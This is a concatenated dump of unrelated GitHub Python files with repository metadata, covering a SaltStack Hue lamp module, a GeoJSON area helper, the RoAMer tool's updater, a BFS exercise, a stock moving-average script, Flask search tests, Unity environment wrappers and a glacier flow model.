lamp.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **type**: Type of the effect. Possible values are \"none\" or \"colorloop\". Default \"none\".\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.effect\n salt '*' hue.effect id=1\n salt '*' hue.effect id=1,2,3 type=colorloop\n \"\"\"\n res = dict()\n\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(dev_id, {\"effect\": kwargs.get(\"type\", \"none\")})\n\n return res\n\n\ndef call_color(*args, **kwargs):\n \"\"\"\n Set a color to the lamp.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **color**: Fixed color. Values are: red, green, blue, orange, pink, white,\n yellow, daylight, purple. Default white.\n * **transition**: Transition 0~200.\n\n Advanced:\n\n * **gamut**: XY coordinates. Use gamut according to the Philips HUE devices documentation.\n More: http://www.developers.meethue.com/documentation/hue-xy-values\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.color\n salt '*' hue.color id=1\n salt '*' hue.color id=1,2,3 oolor=red transition=30\n salt '*' hue.color id=1 gamut=0.3,0.5\n \"\"\"\n res = dict()\n\n colormap = {\n \"red\": Const.COLOR_RED,\n \"green\": Const.COLOR_GREEN,\n \"blue\": Const.COLOR_BLUE,\n \"orange\": Const.COLOR_ORANGE,\n \"pink\": Const.COLOR_PINK,\n \"white\": Const.COLOR_WHITE,\n \"yellow\": Const.COLOR_YELLOW,\n \"daylight\": Const.COLOR_DAYLIGHT,\n \"purple\": Const.COLOR_PURPLE,\n }\n\n devices = _get_lights()\n color = kwargs.get(\"gamut\")\n if color:\n color = color.split(\",\")\n if len(color) == 2:\n try:\n color = {\"xy\": [float(color[0]), float(color[1])]}\n except Exception as ex: # pylint: disable=broad-except\n color = None\n else:\n color = None\n\n if not color:\n color = colormap.get(kwargs.get(\"color\", \"white\"), Const.COLOR_WHITE)\n color.update({\"transitiontime\": max(min(kwargs.get(\"transition\", 0), 200), 0)})\n\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(dev_id, color)\n\n return res\n\n\ndef call_brightness(*args, **kwargs):\n \"\"\"\n Set an effect to the lamp.\n\n Arguments:\n\n * **value**: 0~255 brightness of the lamp.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n * **transition**: Transition 0~200. Default 0.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.brightness value=100\n salt '*' hue.brightness id=1 value=150\n salt '*' hue.brightness id=1,2,3 value=255\n \"\"\"\n res = dict()\n\n if \"value\" not in kwargs:\n raise CommandExecutionError(\"Parameter 'value' is missing\")\n\n try:\n brightness = max(min(int(kwargs[\"value\"]), 244), 1)\n except Exception as err: # pylint: disable=broad-except\n raise CommandExecutionError(\"Parameter 'value' does not contains an integer\")\n\n try:\n transition = max(min(int(kwargs[\"transition\"]), 200), 0)\n except Exception as err: # pylint: disable=broad-except\n transition = 0\n\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(dev_id, {\"bri\": brightness, \"transitiontime\": transition})\n\n return res\n\n\ndef call_temperature(*args, **kwargs):\n \"\"\"\n Set the mired color temperature. More: http://en.wikipedia.org/wiki/Mired\n\n Arguments:\n\n * **value**: 150~500.\n\n Options:\n\n * **id**: Specifies a device ID. Can be a comma-separated values. All, if omitted.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' hue.temperature value=150\n salt '*' hue.temperature value=150 id=1\n salt '*' hue.temperature value=150 id=1,2,3\n \"\"\"\n res = dict()\n\n if \"value\" not in kwargs:\n raise CommandExecutionError(\"Parameter 'value' (150~500) is missing\")\n try:\n value = max(min(int(kwargs[\"value\"]), 500), 150)\n except Exception as err: # pylint: disable=broad-except\n raise CommandExecutionError(\"Parameter 'value' does not contains an integer\")\n\n devices = _get_lights()\n for dev_id in \"id\" not in kwargs and sorted(devices.keys()) or _get_devices(kwargs):\n res[dev_id] = _set(dev_id, {\"ct\": value})\n\n return res\n","repo_name":"saltstack/salt","sub_path":"salt/proxy/philips_hue.py","file_name":"philips_hue.py","file_ext":"py","file_size_in_byte":12811,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"14003135921","text":"import os\nimport json\nfrom typing import Dict, Any, Optional, Union\nfrom area import area\n\n\nGeoJSON = Dict[str, Any]\n\n\ndef get_district_geojson(district: Optional[str] = None) -> Union[Dict[str, GeoJSON], GeoJSON]:\n \"\"\"\n Gets the Berlin districts or a single one of them (if a district name is specified).\n :param district: The optional district to return; if None, all are returned.\n :return: The district or dictionary of districts.\n \"\"\"\n dir = os.path.dirname(os.path.realpath(__file__))\n file = os.path.join(dir, 'berlin_bezirke_osm_mh.geojson')\n with open(file, 'r') as f:\n data = json.load(f)['features']\n districts = {d['properties']['name']: d['geometry'] for d in data}\n return districts if district is None else districts[district]\n\n\ndef geojson_area(geojson: GeoJSON, scale: float = 1.0) -> float:\n \"\"\"\n Gets the area of a GeoJSON object.\n :param geojson: The GeoJSON object.\n :param scale: The scale; for km, use 0.001.\n :return: The area.\n \"\"\"\n a = area(geojson)\n return a * (scale ** 2)\n\n\nif __name__ == '__main__':\n from pprint import pprint\n districts = get_district_geojson()\n pprint(districts)\n print('Berlin Mitte is', geojson_area(districts['Mitte'], 0.001), 'km².')\n","repo_name":"sunsided/osm-berlin","sub_path":"supplemental/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70034410812","text":"import argparse\nimport base64\nimport json\nimport time\nimport zipfile\nimport os\nimport shutil\nimport socket\nimport subprocess\nimport traceback\nimport logging\nfrom ctypes import windll\nfrom utility.win_env import get_user_path\n\n\ndef extract(zip_path, target_path):\n if os.path.exists(target_path):\n shutil.rmtree(target_path)\n with zipfile.ZipFile(zip_path, \"r\") as zf:\n zf.extractall(target_path)\n os.remove(zip_path)\n\n\ndef send_keycode(key_code):\n windll.user32.keybd_event(key_code, 0x45, 1 | 0, 0)\n windll.user32.keybd_event(key_code, 0x45, 1 | 2, 0)\n\n\nclass Updater:\n def __init__(self):\n self.userPath = get_user_path()\n self.config = None\n with open(os.path.join(self.userPath, \"config\"), \"rb\") as f_in:\n self.config = json.loads(f_in.read())\n paths = self.config[\"client_paths\"]\n self.roamerRepoPath = paths[\"repo\"]\n self.roamerZipPath = paths[\"repo_zip\"]\n self.receiverPath = paths[\"receiver\"]\n self.toWhitelistPath = paths[\"to_whitelist\"]\n self.sample = None\n self.tasks = self.config[\"tasks\"]\n self.isLocalUnpacking = False\n self.sock = None\n self.unpacker = None\n # This one has to be imported so, that there is no interaction with the harddisk\n hackSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n def set_local_unpacker(self, value):\n if value:\n logging.info(\"RoAMer Updater set to local mode.\")\n self.isLocalUnpacking = value\n\n def send_output(self, output):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = (self.config[\"host_ip\"], self.config[\"host_port\"])\n logging.info(\n \"sending output to %s:%d\", self.config[\"host_ip\"], self.config[\"host_port\"]\n )\n self.sock.connect(server_address)\n self.sock.sendall(bytes(json.dumps(output), encoding=\"utf-8\"))\n logging.info(\"closing communications\")\n self.sock.shutdown(socket.SHUT_WR)\n self.sock.close()\n\n def send_nothing(self):\n self.send_output(\"empty\")\n\n def extract_source(self):\n logging.info(\"Remove old repo before extracting source\")\n self.cleanup([self.roamerRepoPath])\n logging.info(\"Extract source code\")\n extract(self.roamerZipPath, self.roamerRepoPath)\n\n def compile_source(self):\n logging.info(\"Compile source code\")\n compile_process = subprocess.Popen(\n os.path.join(self.roamerRepoPath, \"compile.bat\", cwd=self.roamerRepoPath)\n )\n compile_process.wait()\n\n def restart_receiver(self, clear_screen=True):\n logging.info(\"Restart the Receiver\")\n send_keycode(0x0D) # Enter\n\n if clear_screen:\n send_keycode(ord(\"C\"))\n send_keycode(ord(\"L\"))\n send_keycode(ord(\"S\"))\n send_keycode(0x0D) # Enter\n send_keycode(0x26) # Up\n\n # restart roamer receiver\n send_keycode(0x26) # Up\n send_keycode(0x0D) # Enter\n\n def remove_this_script(self):\n if self.config[\"staged_update\"]:\n logging.info(\"Remove this update script\")\n os.remove(os.path.join(self.userPath, \"main.exe\"))\n os.remove(os.path.abspath(__file__))\n else:\n logging.info(\"Remove this executable\")\n tmp_bat_path = os.path.join(self.userPath, \"tmp.bat\")\n self_delete_cmd = f\"\"\"\n @echo off\n :start\n if exist {os.path.join(self.userPath, \"main.exe\")} goto delete\n del {tmp_bat_path}\n :delete\n del {os.path.join(self.userPath, \"main.exe\")}\n goto start\n \"\"\"\n with open(tmp_bat_path, \"w\") as f:\n f.write(self_delete_cmd)\n subprocess.Popen(f\"cmd /c {tmp_bat_path}\", stdout=None)\n\n def update_whitelist(self, executable_path):\n self.cleanup([os.path.join(self.userPath, \"pe_header_whitelist.json\")])\n subprocess.Popen(\n [executable_path, os.path.join(\"C:\" + os.sep)], cwd=self.userPath\n ).wait()\n\n def replace_receiver(self, source):\n logging.info(\"Replace Receiver\")\n shutil.copy(source, self.receiverPath)\n\n def _to_base64(self, string):\n return str(base64.b64encode(string), encoding=\"utf-8\")\n\n def _get_content_of_file_as_base64(self, path):\n with open(path, \"rb\") as f_in:\n content = f_in.read()\n return self._to_base64(content)\n\n def gather_data_and_send(self):\n logging.info(\"Send back binaries to Host\")\n result = {}\n if \"compile_on_client\" in self.tasks:\n result.update(\n {\n \"unpacker\": self._get_content_of_file_as_base64(\n os.path.join(self.roamerRepoPath, \"unpacker\", \"dist\", \"main.exe\")\n ),\n \"receiver\": self._get_content_of_file_as_base64(\n os.path.join(self.roamerRepoPath, \"receiver\", \"dist\", \"main.exe\")\n ),\n \"whitelister\": self._get_content_of_file_as_base64(\n os.path.join(self.roamerRepoPath, \"whitelister\", \"dist\", \"PEHeaderWhitelister.exe\")\n ),\n \"update_launcher\": self._get_content_of_file_as_base64(\n os.path.join(self.roamerRepoPath, \"updater\", \"dist\", \"update_launcher.exe\")\n ),\n \"updater\": self._get_content_of_file_as_base64(\n os.path.join(self.roamerRepoPath, \"updater\", \"dist\", \"updater.exe\")\n ),\n }\n )\n if \"whitelist\" in self.tasks:\n result[\"pe_header_whitelist.json\"] = self._get_content_of_file_as_base64(\n os.path.join(self.userPath, \"pe_header_whitelist.json\")\n )\n\n if len(result) != 0:\n self.send_output(result)\n else:\n self.send_nothing()\n\n def cleanup(self, list):\n for entry in list:\n if not os.path.exists(entry):\n continue\n if os.path.isfile(entry):\n os.remove(entry)\n elif os.path.isdir(entry):\n shutil.rmtree(entry)\n\n def run(self):\n results = {}\n # self.load_config()\n start_time = time.time()\n receiver_termination_duration = 4\n strict_cleanup_list = [\n os.path.join(self.userPath, \"config\"),\n os.path.join(self.userPath, \"sample\"),\n ]\n\n if not self.isLocalUnpacking:\n self.send_output(\"RUNNING\")\n\n try:\n if \"compile_on_client\" in self.tasks:\n self.extract_source()\n self.compile_source()\n receiver_source_path = os.path.join(self.roamerRepoPath, \"receiver\", \"dist\", \"main.exe\")\n whitelister_source_path = (\n os.path.join(self.roamerRepoPath, \"whitelister\", \"dist\", \"PEHeaderWhitelister.exe\")\n )\n strict_cleanup_list += [self.roamerRepoPath, self.roamerZipPath]\n\n if \"receiver_bin_to_client\" in self.tasks:\n receiver_source_path = os.path.join(self.userPath, \"new_receiver.exe\")\n strict_cleanup_list += [receiver_source_path]\n\n if \"overwrite_receiver\" in self.tasks:\n now = time.time()\n sleep_time = start_time + receiver_termination_duration - now\n if sleep_time > 0:\n time.sleep(sleep_time)\n self.replace_receiver(receiver_source_path)\n\n if \"whitelister_bin_to_client\" in self.tasks:\n whitelister_source_path = os.path.join(self.userPath, \"whitelister.exe\")\n strict_cleanup_list += [whitelister_source_path]\n\n if \"whitelist\" in self.tasks:\n self.update_whitelist(whitelister_source_path)\n\n if not self.isLocalUnpacking:\n self.gather_data_and_send()\n\n if \"reinit_and_store\" in self.tasks:\n if self.config[\"requires_cleaning_before_snapshot\"]:\n self.cleanup(strict_cleanup_list)\n self.remove_this_script()\n self.restart_receiver()\n\n except Exception as e:\n if not self.isLocalUnpacking:\n self.send_output(f\"EXCEPTION from client:\\n{traceback.format_exc()}\")\n else:\n print(traceback.format_exc())\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n format=\"%(asctime)-15s %(levelname)-7s %(module)s.%(funcName)s(): %(message)s\",\n level=logging.DEBUG,\n )\n\n parser = argparse.ArgumentParser(description=\"RoAMer Update Module.\")\n parser.add_argument(\n \"--local\",\n action=\"store_true\",\n help=\"Run the updater locally and don't send back results.\",\n )\n args = parser.parse_args()\n updater = Updater()\n updater.set_local_unpacker(args.local)\n updater.run()\n","repo_name":"fkie-cad/RoAMer","sub_path":"updater/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"78"} +{"seq_id":"31811890870","text":"class Graph:\n\n def __init__(self, vertices):\n self.vertices = vertices\n self.adj_list = {}\n\n for vertice in self.vertices:\n self.adj_list[vertice] = []\n \n def add_edge(self, vertice, edge):\n self.adj_list[vertice].append(edge)\n self.adj_list[edge].append(vertice)\n\n def print_adj(self):\n for vertice in self.vertices:\n print(vertice, ':', self.adj_list[vertice])\n\n\ndef bfs(grafo, start, goal):\n visited = []\n fila = [[start]]\n while fila:\n path = fila.pop(0)\n ele = path[-1]\n\n if ele not in visited:\n vizinhos = grafo[ele]\n \n for vizinho in vizinhos:\n new_path = list(path)\n new_path.append(vizinho)\n fila.append(new_path)\n \n if vizinho == goal:\n print(len(new_path))\n return\n visited.append(ele)\n\n\nv = int(input())\na,b = input().split(',')\na = int(a)\nb = int(b)\nv_lista = []\n\nfor i in range(1, v+1):\n v_lista.append(i)\n\ng = Graph(v_lista)\n\nwhile a != -1:\n g.add_edge(a, b)\n a,b = input().split(',')\n a = int(a)\n b = int(b)\n \n\n\nbfs(g.adj_list, 1, v ) \n","repo_name":"Gama43/Estrutura-de-Dados","sub_path":"Busca BFS (Grafo).py","file_name":"Busca BFS (Grafo).py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42868350391","text":"#!/usr/bin/env python3\nimport yfinance as yf\nimport pandas as pd\n\n\ndef moving_average_calc(df, days, col=\"Close\"):\n if len(df) > days:\n close_col = df[[col]]\n close_last_100days = close_col.tail(100)\n\n # calculates moving average over last 100 days\n moving_average = int(close_last_100days.sum()) / days\n\n else:\n print(\"\\nData is not sufficient to calculate\")\n\n return buy_sell_recommendation(df,moving_average)\n\n\ndef buy_sell_recommendation(df, ma):\n curr_closing_price = df[\"Close\"][-1] # current closing price\n\n if curr_closing_price >= ma:\n print(\"\\nCurrent price is over 100-day moving average -- Good time to buy shares!\")\n stock_above_sma.append(ticker)\n else:\n print(\"\\nCurrent price is under 100-day moving average -- You should sell some shares!\")\n stock_below_sma.append(ticker)\n\n\nstock_above_sma = [] # List of stocks above 100-day moving average\nstock_below_sma = [] # List of stocks below 100-day moving average\n\n# df = yf.download(ticker, period=\"1yr\", interval=\"1d\")\nticker = 'AAPL'\nstock = yf.Ticker(ticker)\nhist = stock.history(period=\"6mo\")\ndf = pd.DataFrame(hist)\n\nma = moving_average_calc(df, days=100)\n","repo_name":"atran1015/stockportfolio","sub_path":"stock_strategy_A.py","file_name":"stock_strategy_A.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73653583932","text":"import linked_list as LinkedList\n\ndef swap_nodes(input_list, val1, val2):\n \n node1 = input_list.head_node\n node2 = input_list.head_node\n node1_prev = None\n node2_prev = None\n\n if val1 == val2:\n print('Element are the same - no swap needed')\n return \n \n print(f'Swap {val1} with {val2}')\n\n while node1 is not None:\n if node1.get_value() == val1:\n break\n node1_prev = node1\n node1 = node1.get_next_node()\n\n while node2 is not None:\n if node2.get_value() == val2:\n break\n node2_prev = node2\n node2 = node2.get_next_node()\n \n if (node1 is None or node2 is None):\n print('Swap not possible - onde or mor element is not in the list')\n return\n\n #this if statement check if the node1 is the head_node, if it is then input_list.head_node assign node2\n #if it's not, node1_prev assing nodo2\n if node1_prev is None:\n input_list.head_node = node2\n else:\n node1_prev.set_next_node(node2)\n\n #this if statement check if the node2 is the head_node, if it is, then input_list.head_node assign node1\n \n if node2_prev is None:\n input_list.head_node = node1\n else:\n node2_prev.set_next_node(node1)\n\n #setting the new next node of node1 and node 2\n node2.get_next_node()\n temp = node1.get_next_node()\n\n node1.set_next_node(node2.get_next_node())\n node2.set_next_node(temp)\n\n\nll = LinkedList.LinkedList()\nfor i in range(10):\n ll.insert_beginning(i)\n\nprint(ll.stringify_list())\nswap_nodes(ll, 9, 5)\nprint(ll.stringify_list())","repo_name":"Adnunes/LinkedList","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15548231573","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 29 23:03:51 2020\n\n@author: Praca\n\"\"\"\n\nfrom psychopy import core, visual\nfrom psychopy.hardware import keyboard\n\nimport pyxid2 as pyxid\n\nwin = visual.Window(\n size=[1920, 1080], fullscr=True, screen=0, \n winType='pyglet', allowGUI=False, allowStencil=False,\n monitor='testMonitor', color=[0.725,0.725,0.725], colorSpace='rgb',\n blendMode='avg', useFBO=True, \n units='pix')\n\ntext = visual.TextStim(win)\n\nkey = keyboard.Keyboard()\n\ndevices = pyxid.get_xid_devices()\ncore.wait(0.1)\ncedrus = devices[0]\n\nrun = True\n\nwhile run:\n text.draw()\n win.flip()\n \n cedrus.poll_for_response()\n if len(cedrus.response_queue):\n evt = cedrus.get_next_response()\n text.setText(evt['key'])\n \n char = key.getKeys()\n if char:\n if char[-1].name == 'escape':\n run = False\n else:\n text.setText(char[-1].name)\n\nwin.close()\ncore.quit()","repo_name":"COST-EEG/Gabor-Attention","sub_path":"components/cedrus_test.py","file_name":"cedrus_test.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70210146494","text":"import pytest\nfrom flask import current_app\nfrom logger.app import create_app\n\n\n@pytest.fixture(scope=\"module\")\ndef client():\n if not current_app:\n app = create_app()\n else:\n app = current_app\n app.testing = True\n with app.test_client() as client:\n yield client\n\n\n@pytest.mark.parametrize(\n \"endpoint,expected\",\n [\n (\"/search/browser/philippines\", 8),\n (\"/search/IE/philippines\", 31),\n ],\n)\ndef test_simple_search(client, endpoint, expected):\n res = client.get(endpoint)\n assert len(res.json) == expected\n\n\nqueries = [\n (\n {\"CONTAINS\": {\"message\": \"error\"}},\n 0,\n ),\n ({\"IS\": {\"browser\": \"chrome\"}}, 0),\n (\n {\"NOT\": {\"IS\": {\"country\": \"Brazil\"}}},\n 95,\n ),\n (\n {\n \"AND\": [\n {\"IS\": {\"browser\": \"Firefox\"}},\n {\"IS\": {\"country\": \"Philippines\"}},\n ]\n },\n 3,\n ),\n (\n {\n \"NOT\": {\n \"OR\": [\n {\n \"AND\": [\n {\"IS\": {\"browser\": \"Safari\"}},\n {\"IS\": {\"country\": \"Sweden\"}},\n ]\n },\n {\"CONTAINS\": {\"message\": \"Integer\"}},\n ]\n }\n },\n 85,\n ),\n]\n\n\n@pytest.mark.parametrize(\n \"test_input,expected\",\n queries,\n)\ndef test_query_logger(client, test_input, expected):\n response = client.get(\"/search/query\", json=test_input)\n assert len(response.json) == expected\n\n\n@pytest.mark.parametrize(\n \"test_input\",\n [\n {\"OPERATION_DOES_NOT_EXISTS\": {\"message\": \"error\"}},\n {\"CONTAINS\": {\"random_column\": \"error\"}},\n {\"AND\": {\"message\": \"error\"}},\n {\"AND\": [{\"message\": \"error\"}]},\n {\"AND\": []},\n {\"OR\": {\"browser\": \"Safari\"}},\n {\"OR\": [{\"browser\": \"Safari\"}]},\n {\"OR\": []},\n {\"NOT\": {\"NOT\": {\"country\": \"Brazil\"}}},\n {\"NOT\": [{\"IS\": {\"browser\": \"Safari\"}}, {\"IS\": {\"country\": \"Sweden\"}}]},\n ],\n)\ndef test_query_validation(client, test_input):\n response = client.get(\"/search/query\", json=test_input)\n assert response.status_code == 400\n","repo_name":"chicochico/cx-log-search","sub_path":"tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75129018811","text":"from .base import Environment, ClosedEnvironmentError\nfrom unityagents import UnityEnvironment\nfrom abc import abstractclassmethod, abstractproperty, abstractmethod\nfrom . import resources\nimport os\nfrom .base import IntInterval, CartesianProduct,\\\n FloatInterval, MultiEnvironmentMixin\nimport numpy as np\n\nclass UnityBasedEnvironment(Environment):\n '''\n A severe limitation of the UnityEnvironment in unityagents is that only one can be substantiated in \n a given Python process and it is incompatible with the multiprocessing package, perhaps due to its \n use of gRPC (see https://github.com/Unity-Technologies/ml-agents/issues/956).\n \n Somehow, the nose module's multiprocess plugin works around these issues, but I don't understand how \n and can't recreate it. Therefore, only one UnityBasedEnvironment can be instantiated in the entire \n history of a particular Python process.\n '''\n @abstractclassmethod\n def path(self):\n '''\n Subclasses should set this to be the path to the \n desired Unity environment.\n '''\n \n # It's necessary for UnityEnvironments to have unique worker_ids. We can \n # ensure no two environments in a process share the same worker id by keeping\n # a count.\n worker_count = 0\n \n def __del__(self):\n UnityBasedEnvironment.worker_count -= 1\n \n def __init__(self, graphics=False):\n # Attempt to make worker_id differ across processes. Obviously not guaranteed,\n # especially if each process has multiple workers.\n worker_id = (os.getpid() % 100) + UnityBasedEnvironment.worker_count\n self.env = UnityEnvironment(\n file_name=self.path, \n no_graphics=(not graphics),\n worker_id=worker_id,\n# docker_training=True,\n )\n UnityBasedEnvironment.worker_count += 1\n self.brain_name = self.env.brain_names[0]\n self.brain = self.env.brains[self.brain_name]\n env_info = self.env.reset(train_mode=True)[self.brain_name]\n example_state = env_info.vector_observations[0]\n self._state_size = len(example_state)\n self._n_actions = self.brain.vector_action_space_size\n self.closed = False\n \n def reset(self, train):\n if self.closed:\n raise ClosedEnvironmentError('Environment is already closed.')\n env_info = self.env.reset(train_mode=train)[self.brain_name]\n return np.array(env_info.vector_observations)\n \n @abstractmethod\n def transform_action(self, action):\n pass\n \n def step(self, action):\n if self.closed:\n raise ClosedEnvironmentError('Environment is already closed.')\n env_info = self.env.step(self.transform_action(action))[self.brain_name]\n state = np.array(env_info.vector_observations)\n reward = np.array(env_info.rewards)\n done = np.array(env_info.local_done)\n return state, reward, done\n \n def close(self):\n if self.closed:\n return\n self.env.close()\n self.closed = True\n \nclass BananaEnvironment(UnityBasedEnvironment):\n path = resources.banana\n \n def transform_action(self, action):\n return action\n \n @property\n def action_space(self):\n return CartesianProduct([IntInterval(0, self._n_actions - 1)])\n \n @property\n def state_space(self):\n return CartesianProduct([FloatInterval()] * 37)\n\nclass ReacherEnvironmentBase(UnityBasedEnvironment):\n def transform_action(self, action):\n return np.tanh(action)\n\nclass ReacherV1Environment(ReacherEnvironmentBase):\n path = resources.reacher_v1\n \n @property\n def action_space(self):\n return CartesianProduct([FloatInterval()] * 4)\n \n @property\n def state_space(self):\n return CartesianProduct([FloatInterval()] * 33)\n \nclass ReacherV2Environment(ReacherEnvironmentBase, MultiEnvironmentMixin):\n path = resources.reacher_v2\n def __init__(self, graphics=False):\n UnityBasedEnvironment.__init__(self, graphics=graphics)\n \n @property\n def action_space(self):\n return CartesianProduct([[FloatInterval()] * 4] * 20)\n\n @property\n def state_space(self):\n return CartesianProduct([[FloatInterval()] * 33] * 20)\n","repo_name":"jcrudy/drlnd_p2","sub_path":"ppo/environment/unity_adapter.py","file_name":"unity_adapter.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29200527640","text":"import numpy as np\nfrom FlowModelFuncs import TransientFlowModel\nfrom ParticleModelFuncs import vector_arrows, cell_cnc_tracker, calc_export\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom BuildGlacier import Glacier\nfrom PlottingTools import plotFigures\n\n# time is measured in DAYS.\n# since we are simulating an unconfined aquifer, the \n# hydraulic head is equal to the water table height \n# above sea level\n\n\"\"\"\nHydraulic head calculations:\n\nInitial hydraulic head is calculated from elevation \nabove sea level of the weathering crust lower boundary\nand the initial water table height above the lower \nsurface. This gives the hydraulic head at the water table,\nbut we calculate head and flow at a given resolution \nwithin the water table, so the head must be calculated\nfor each vertical step as defined by the WC_thickness \nand cell_spacing_z (so for a 5m thick WC and a vertical\nresolution of 1m, 5 hydraulic head values are required). \nThis is achieved using the equation:\n\n# h = psi + z \n\n# where h = hydraulic head, psi = pressure head (i.e. \n# elevation difference between measurement point \n# and water table, and z = elevation at the measurement\n# point). These calculated hydraulic heads are \n# added to the appropriate layer of HI and the initial \n# heads are thus defined.\n\nTODO: calculate volume lost to surface runoff\n\"\"\"\n\n\n# program config\nsavepath = '/home/joe/Code/FlowModel/Outputs/'\ndatapath = '/home/joe/Code/FlowModel/Data/'\nepsilon = 0.67\nplot_types = [\"Q\",\"BBA\",\"Cell Export at Terminus\",\\\n\"Cumulative Cell Export at Terminus\"] \n\n# select what to plot, options are Q (net inflow to cells), \n# Qs (water released from storage), \n# Qx (flow across lateral cell boundaries)\n# Qy (flow across longitudinal cell boundaries), \n# Phi (hydraulic head at cell centres), \n# BBA (broadband albedo).\n# Provide as list of strings or set to \"None\".\n\nplot_layer = 0 # which vertical layer to plot (0 = top, -1 = bottom)\nfigsize = (15, 15)\nt = np.arange(0, 100, 10) # time to run model over in days\nlat = 67.04 # site latitude\nlon = 49.99 # site longitude\nday = 202 # day of year\ntime = 1500 # time of day (24hr)\n\n# grid size\nlength = 100\nwidth = 100\nWC_thickness0 = 5 # initial WC thickness at t=0\ncell_spacing_xy = 1 # size of cells in meters in horizontal dimension\ncell_spacing_z = 1 # size of cells in meters in vertical dimension\nx = np.arange(0, width, cell_spacing_xy)\ny = np.arange(0, length, cell_spacing_xy)\nz = np.arange(0, WC_thickness0, cell_spacing_z)\nkxy = 3.15\nkz = 0.75\n\n# environmental variables\nslope = 3 # topographic slope from upper to lower boundary, 1 = lose as much height as horizontal distance\naspect = 180 # degrees, N is 0\nroughness = 0.005 # default is 0.005\nbase_elevation = 100 # raise entire surface this far above sea level\nWaterTable0 = 0.2 # proportion of WC filled with water at t=0\nmelt_rate0 = 0.001 # water added by melting in m3/d\nrainfall0 = 0 # water added by rainfall in m3/d\nloss_at_edges = 2 # extraction rate at glacier sides m3/d\nloss_at_terminus = 20 # extraction rate at glacier termins\ncryoconite_coverage = 0.02 # fraction of total surface covered by cryoconite holes\nmoulin_location = None #((50,60),(50,60)) # give cell indices for horizontal extent in 1st tuple, vertical extent in 2nd tuple, or set to None\nmoulin_extr_rate = 200 #rate of extraction via moulin, m3/d\nstream_location = None #((0,-10),(20,30))\nconstrain_head_to_WC = True # toggling this ON means the hydraulic head cannot rise above the upper glacier surface nor drop below the lower WC boundary\nporosity0 = 0.3 # initial porosity in each cell\nspecific_retention = 0.05 # tune-able, describes proportion of water left behind after aquifer drains - set to value for fine gravel from Bear et al (1973)\nMELT_CALCS = True # toggle whether to initiate the albedo-melt-porosity feedback calculations\nalgal_coverage = [65,0,0,20,10,10] # % coverage of each algal concentration from clean to 100000ppb - must add to 100%\n\n# meteorological variables\nlapse = 0.65 \nwindspd = 0.5 \nairtemp = 1\ninswrd = 65 \navp = 900 \n\n#microbial variables\ncell0 = 1000 # initial cell concentration in cell/mL\ncellG = 0.6 # growth rate\ncellD = 0.3 # death rate\n\n# BUILD GLACIER\nglacier = Glacier(x, y, z, cell_spacing_xy, cell_spacing_z,\\\n base_elevation, WC_thickness0, porosity0, specific_retention,\\\n WaterTable0, cryoconite_coverage, melt_rate0, rainfall0, slope,\\\n kxy, kz, loss_at_edges, loss_at_terminus, stream_location,\\\n moulin_location, moulin_extr_rate, algal_coverage, lat, lon, day,\\\n time, aspect, roughness, lapse, windspd, airtemp, inswrd, avp)\n\n# CALCULATE FLOWS\nOut,porosity = TransientFlowModel(x, y, z, t, glacier, epsilon, constrain_head_to_WC,\\\n rainfall0, MELT_CALCS, moulin_location, datapath)\n\n# CALCULATE COMPONENT VECTORS\nX,Y,Z,U,V,W = vector_arrows(Out, x, y, z, plot_layer)\n\n# CALCULATE CELL FLUXES\nCells, CellColumnTot = cell_cnc_tracker(Out, U, V, W, t, cell0, cellG, cellD,\\\n glacier.SHP, glacier.cryoconite_locations)\n\n# SUMMARISE CELL FLUXES\nTotalExport, CumExport = calc_export(CellColumnTot)\n\n# PLOT FIGURES\nplotFigures(x, y, z, plot_types, Out, t, plot_layer, Cells, CellColumnTot,\\\n TotalExport, CumExport, figsize, savepath)","repo_name":"jmcook1186/FlowModel","sub_path":"FlowModelDriver.py","file_name":"FlowModelDriver.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18216405045","text":"from django.utils import timezone\nfrom datetime import timedelta\nfrom 